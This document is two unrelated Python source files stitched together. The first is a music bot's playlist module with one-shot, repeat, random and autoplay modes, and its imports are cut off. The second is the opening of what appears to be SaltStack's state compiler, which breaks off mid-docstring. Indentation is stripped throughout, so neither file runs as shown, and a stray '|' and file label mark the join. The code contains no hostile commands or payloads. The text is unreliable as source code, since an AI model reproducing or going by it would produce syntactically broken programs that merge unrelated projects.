from media.item import ValidationFailedError, PreparationFailedError
def get_playlist(mode, _list=None, _index=None):
index = -1
if _list and _index is None:
index = _list.current_index
if _list is None:
if mode == "one-shot":
return OneshotPlaylist()
elif mode == "repeat":
return RepeatPlaylist()
elif mode == "random":
return RandomPlaylist()
elif mode == "autoplay":
return AutoPlaylist()
else:
if mode == "one-shot":
return OneshotPlaylist().from_list(_list, index)
elif mode == "repeat":
return RepeatPlaylist().from_list(_list, index)
elif mode == "random":
return RandomPlaylist().from_list(_list, index)
elif mode == "autoplay":
return AutoPlaylist().from_list(_list, index)
raise
class BasePlaylist(list):
def __init__(self):
super().__init__()
self.current_index = -1
self.version = 0 # increase by one after each change
self.mode = "base" # "repeat", "random"
self.pending_items = []
self.log = logging.getLogger("bot")
self.validating_thread_lock = threading.Lock()
def is_empty(self):
return True if len(self) == 0 else False
def from_list(self, _list, current_index):
self.version += 1
super().clear()
self.extend(_list)
self.current_index = current_index
return self
def append(self, item: CachedItemWrapper):
self.version += 1
super().append(item)
self.pending_items.append(item)
self.async_validate()
return item
def insert(self, index, item):
self.version += 1
if index == -1:
index = self.current_index
super().insert(index, item)
if index <= self.current_index:
self.current_index += 1
self.pending_items.append(item)
self.async_validate()
return item
def extend(self, items):
self.version += 1
super().extend(items)
self.pending_items.extend(items)
self.async_validate()
return items
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
return False
def point_to(self, index):
if -1 <= index < len(self):
self.current_index = index
def find(self, id):
for index, wrapper in enumerate(self):
if wrapper.item.id == id:
return index
return None
def __delitem__(self, key):
return self.remove(key)
def remove(self, index):
self.version += 1
if index > len(self) - 1:
return False
removed = self[index]
super().__delitem__(index)
if self.current_index > index:
self.current_index -= 1
# reference counter
counter = 0
for wrapper in self:
if wrapper.id == removed.id:
counter += 1
if counter == 0:
var.cache.free(removed.id)
return removed
def remove_by_id(self, id):
to_be_removed = []
for index, wrapper in enumerate(self):
if wrapper.id == id:
to_be_removed.append(index)
if to_be_removed:
self.version += 1
for index in to_be_removed:
self.remove(index)
def current_item(self):
if len(self) == 0:
return False
return self[self.current_index]
def next_index(self):
if self.current_index < len(self) - 1:
return self.current_index + 1
else:
return False
def next_item(self):
if self.current_index < len(self) - 1:
return self[self.current_index + 1]
else:
return False
def randomize(self):
# current_index will lose track after shuffling, thus we take current music out before shuffling
# current = self.current_item()
# del self[self.current_index]
random.shuffle(self)
# self.insert(0, current)
self.current_index = -1
self.version += 1
def clear(self):
self.version += 1
self.current_index = -1
var.cache.free_all()
super().clear()
def save(self):
var.db.remove_section("playlist_item")
assert self.current_index is not None
var.db.set("playlist", "current_index", self.current_index)
for index, music in enumerate(self):
var.db.set("playlist_item", str(index), json.dumps({'id': music.id, 'user': music.user}))
def load(self):
current_index = var.db.getint("playlist", "current_index", fallback=-1)
if current_index == -1:
return
items = var.db.items("playlist_item")
if items:
music_wrappers = []
items.sort(key=lambda v: int(v[0]))
for item in items:
item = json.loads(item[1])
music_wrapper = get_cached_wrapper_by_id(item['id'], item['user'])
if music_wrapper:
music_wrappers.append(music_wrapper)
self.from_list(music_wrappers, current_index)
def _debug_print(self):
print("===== Playlist(%d) =====" % self.current_index)
for index, item_wrapper in enumerate(self):
if index == self.current_index:
print("-> %d %s" % (index, item_wrapper.format_debug_string()))
else:
print("%d %s" % (index, item_wrapper.format_debug_string()))
print("===== End =====")
def async_validate(self):
if not self.validating_thread_lock.locked():
time.sleep(0.1) # Just avoid validation finishes too fast and delete songs while something is reading it.
th = threading.Thread(target=self._check_valid, name="Validating")
th.daemon = True
th.start()
def _check_valid(self):
self.log.debug("playlist: start validating...")
self.validating_thread_lock.acquire()
while len(self.pending_items) > 0:
item = self.pending_items.pop()
try:
item.item()
except ItemNotCachedError:
# In some very subtle case, items are removed and freed from
# the playlist and the cache, before validation even starts,
# causes, freed items remain in pending_items.
# Simply ignore these items here.
continue
self.log.debug("playlist: validating %s" % item.format_debug_string())
ver = item.version
try:
item.validate()
except ValidationFailedError as e:
self.log.debug("playlist: validating failed.")
if var.bot:
var.bot.send_channel_msg(e.msg)
var.cache.free_and_delete(item.id)
self.remove_by_id(item.id)
continue
if item.version > ver:
self.version += 1
self.log.debug("playlist: validating finished.")
self.validating_thread_lock.release()
class OneshotPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "one-shot"
self.current_index = -1
def current_item(self):
if self.current_index == -1:
self.current_index = 0
return self[self.current_index]
def from_list(self, _list, current_index):
if len(_list) > 0:
if current_index > -1:
for i in range(current_index):
_list.pop(0)
return super().from_list(_list, 0)
return super().from_list(_list, -1)
return self
def next(self):
if len(self) > 0:
self.version += 1
if self.current_index != -1:
super().__delitem__(self.current_index)
if len(self) == 0:
return False
else:
self.current_index = 0
return self[0]
else:
self.current_index = -1
return False
def next_index(self):
if len(self) > 1:
return 1
else:
return False
def next_item(self):
if len(self) > 1:
return self[1]
else:
return False
def point_to(self, index):
self.version += 1
self.current_index = -1
for i in range(index):
super().__delitem__(0)
class RepeatPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "repeat"
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.current_index = 0
return self[0]
def next_index(self):
if self.current_index < len(self) - 1:
return self.current_index + 1
else:
return 0
def next_item(self):
return self[self.next_index()]
class RandomPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "random"
def from_list(self, _list, current_index):
self.version += 1
random.shuffle(_list)
return super().from_list(_list, -1)
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.version += 1
self.randomize()
self.current_index = 0
return self[0]
class AutoPlaylist(OneshotPlaylist):
def __init__(self):
super().__init__()
self.mode = "autoplay"
def refresh(self):
dicts = var.music_db.query_random_music(var.config.getint("bot", "autoplay_length", fallback=5),
Condition().and_not_sub_condition(
Condition().and_like('tags', "%don't autoplay,%")))
if dicts:
_list = [get_cached_wrapper_from_dict(_dict, "AutoPlay") for _dict in dicts]
self.from_list(_list, -1)
# def from_list(self, _list, current_index):
# self.version += 1
# self.refresh()
# return self
def clear(self):
super().clear()
self.refresh()
def next(self):
if len(self) == 0:
self.refresh()
return super().next()
|
state.py
|
# -*- coding: utf-8 -*-
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
# Import salt libs
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import SaltRenderError, SaltReqTimeoutError
# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{0}".format(name),
"__id__": "listen_{0}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
Scan high data for the id referencing the given name and return a list of (IDs, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in six.iteritems(high):
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
Scan for all ids in the given sls and return them in a dict; {name: state}
"""
ret = []
for nid, item in six.iteritems(high):
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], six.string_types):
msg = "File changed:\n{0}".format(chg["diff"])
if all([isinstance(x, dict) for x in six.itervalues(chg)]):
if all([("old" in x and "new" in x) for x in six.itervalues(chg)]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{0}' changed from '{1}' to '{2}'\n".format(
pkg, old, new
)
if not msg:
msg = six.text_type(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(six.text_type(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler(object):
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# Is this is a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
if not isinstance(name, six.string_types):
errors.append(
"ID '{0}' in SLS '{1}' is not formed as a string, but "
"is a {2}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {0} in {1} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{0}' in SLS '{1}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{0}" in state '
'"{1}" in SLS "{2}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {0}"
" statement in state '{1}' in SLS '{2}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, six.string_types):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {0}"
" in SLS {1} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
(
"Invalid requisite type '{0}' "
"in state '{1}', in SLS "
"'{2}'. Requisite types must "
"not contain dots, did you "
"mean '{3}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{0}", '
"is SLS {1}\n"
).format(
six.text_type(req_val),
body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{0}" ID "{1}" ID "{2}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{0}' in SLS"
" '{1}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{0}' in" " SLS '{1}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{0}' in "
"SLS '{1}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
for state, run in six.iteritems(body):
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, six.string_types):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State(object):
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = six.text_type(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = six.text_type(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, six.string_types):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{0}.{1}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{0}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{0}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, six.string_types):
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {0}".format(entry)
log.warning(ret["comment"])
return ret
result = self._run_check_function(entry)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, six.string_types):
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {0}".format(entry)
log.warning(ret["comment"])
return ret
result = self._run_check_function(entry)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def reset_run_num(self):
"""
Rest the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
Read the state loader value and loadup the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], six.string_types):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{0}{1}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
"""
